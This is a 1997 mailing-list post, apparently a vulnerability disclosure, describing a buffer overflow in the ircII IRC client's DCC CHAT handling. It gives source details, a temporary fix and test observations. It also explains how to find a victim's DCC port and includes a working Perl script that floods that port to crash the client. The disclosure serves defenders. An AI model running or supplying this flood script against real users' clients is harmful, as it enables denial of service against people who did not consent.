(no subject)

super@POOL69.CE.NET
Sat, 21 Jun 1997 11:17:32 -0400

There seems to be a small buffer overflow in the UNIX irc client ircII.
This can't be used gain unauthorized priveleges since the program isn't set uid
or gid, but can be a denial of service attack, and can cause some interesting
problems on certain systems. By connecting to a listening DCC (Direct Client
Connection) CHAT port, and flooding slowly with a single character the irc
client will crash (Segmentation Fault). This was tested on ircii-2.9alpha6,
but the bug should still be exploitable in earlier versions (like 2.8.2)
because the NEWS file in the root directory reveals no changes to the way the
client handles incoming DCC CHATs. When I tested on BitchX by hand it
created a segfault, but the attached perl script doesn't spew trash fast
enough but can cause other problems.. BitchX complains with "DCC buffer
overrun. Data lost. ..When tested on a BitchX client on a Slackware
Linux box, the following happened:

Jun 21 01:44:10 oblivion inetd[2713]: /usr/sbin/nmbd: exit status 0x1
Jun 21 01:44:13 oblivion last message repeated 2 times
1:51am up 27 days, 5:09, 3 users, load average: 1.14, 1.09, 0.68

Notice the high load average.. the only processes on this 486DX4/100 with 16
megs of RAM were a few idle services, a few shells and the irc client.
When I used top to view the CPU usage the BitchX was second most CPU-active
program (below top), which is too much for an irc client..
I hadn't the slightest idea what nmbd was, there was no manpage, and nothing
in /usr/doc .. but a grep search of inetd.conf turned up this:

netbios-ns dgram udp wait root /usr/sbin/nmbd nmbd

Those darned netbios services seem to be vulnerable to all sorts of things. ;)
The problem lies in the process_incoming_chat() function in dcc.c on line 1141.

char tmp[BIG_BUFFER_SIZE+1];

BIG_BUFFER_SIZE is only 2048 bytes.. this is #include'ed from irc.h lines 120
and 121:

#define IRCD_BUFFER_SIZE 1024
#define BIG_BUFFER_SIZE (IRCD_BUFFER_SIZE * 2)

A temporary fix if absolutely needed would be to #define BIG_BUFFER_SIZE in
irc.h to something larger and recompile.

To exploit this you'll need to know the port the client is listening for
by using ircII and reading raw_irc messages by: /on ^raw_irc "*" echo $0-
When a DCC CHAT is issued from a user it will look something like this:

PRIVMSG Lamer :^ADCC CHAT chat 3479866442 1533^A

The first set of numbers is the decimal IP address, and the second is the
port.. which can be used in the usage of the following perl script..

------------------------------ ircii-dcc.pl -------------------------------

#!/usr/local/bin/perl -w
# $Id: ircii-dcc.pl,v 1.1 1997/06/21 03:57:55 super Exp $
use strict;
use Socket;
if(!($ARGV[1])){print("usage: $0 host port","\n");exit;}
my $port = $ARGV[1]; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
my $infstr = "a";
while(1){
select(undef, undef, undef, rand);
send(SKT,$infstr,0) || die "send() $!";
}

------------------------------ ircii-dcc.pl ------------------------------

I wouldn't consider this a major security vulnerability unless I'm missing
something with the overflow... But DCC CHAT's are becoming used more
frequently on irc as an alternative because of lag when chatting between
irc servers.

.--------------------------------.
| super@innu.org |
|--------------------------------|
| http://www.ce.net/users/super/ |
| Fight SPAM! www.cauce.org |
| S@IRC |
`--------------------------------'